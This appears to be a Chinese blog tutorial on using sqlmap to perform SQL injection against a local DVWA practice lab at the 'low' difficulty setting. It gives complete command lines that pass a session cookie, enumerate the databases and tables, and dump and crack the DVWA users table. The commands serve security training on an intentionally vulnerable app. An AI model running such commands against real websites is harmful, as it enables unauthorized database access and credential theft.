dvwa之sql injection之sqlmap工具注入(low版)

可能要用到的参数:

-u             指定URL

--cookie     带cookie注入


爆库:

--dbs     发现所有数据库 (参数前有空格)

列出数据库:

--tables     列出数据库表  (参数前有空格)

-D            选择数据库


首先一定先把难度调为low


当写1-5的时候,都会有值出来


直接上工具


如下:Sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id =1&submit=sublit#"


有一个302跳转,跳转到的是登录页面,所以这个时候需要使用cookie进行会话维持,然后使用burpsuite或者是f12都行,找到cookie:


security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5

构造语句:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"

得到的值:



然后进行爆数据库处理:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --dbs

得到的结果如下:


看到了我们想要的

列出数据库表:

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --tables -D dvwa

   -D选项是选择数据库为dvwa

然后 


列出users表的所有字段


–columns -T “users”<列出mysql数据库中的user表的所有字段> (columns参数前带空格)

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  --columns -T users    //两个--

然后就是使用字典(自带)进行解密

-T users --dump

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  -T users --dump


中间是y 1 n 回车


结果就出来啦





  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值